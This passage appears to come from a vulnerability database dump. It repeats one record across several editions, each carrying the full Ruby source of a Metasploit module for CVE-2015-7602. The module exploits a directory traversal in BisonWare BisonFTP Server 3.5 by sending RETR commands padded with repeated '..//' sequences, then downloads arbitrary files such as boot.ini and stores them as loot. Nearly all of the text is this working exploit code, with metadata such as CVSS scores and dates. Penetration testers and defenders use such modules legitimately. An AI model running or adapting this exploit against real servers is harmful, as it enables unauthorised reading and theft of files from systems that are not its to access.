store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-08T10:10:12", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-08T12:09:51", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-08T12:09:51", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-08T12:09:51", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-21T22:52:06", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-21T22:52:06", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-21T22:52:06", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-22T00:52:35", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-22T00:52:35", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-02-22T00:52:35", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-24T19:47:16", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-24T19:47:16", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-24T19:47:16", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-24T23:12:07", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-24T23:12:07", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-24T23:12:07", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T13:50:49", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T13:50:49", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T13:50:49", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T15:56:21", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T15:56:21", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n 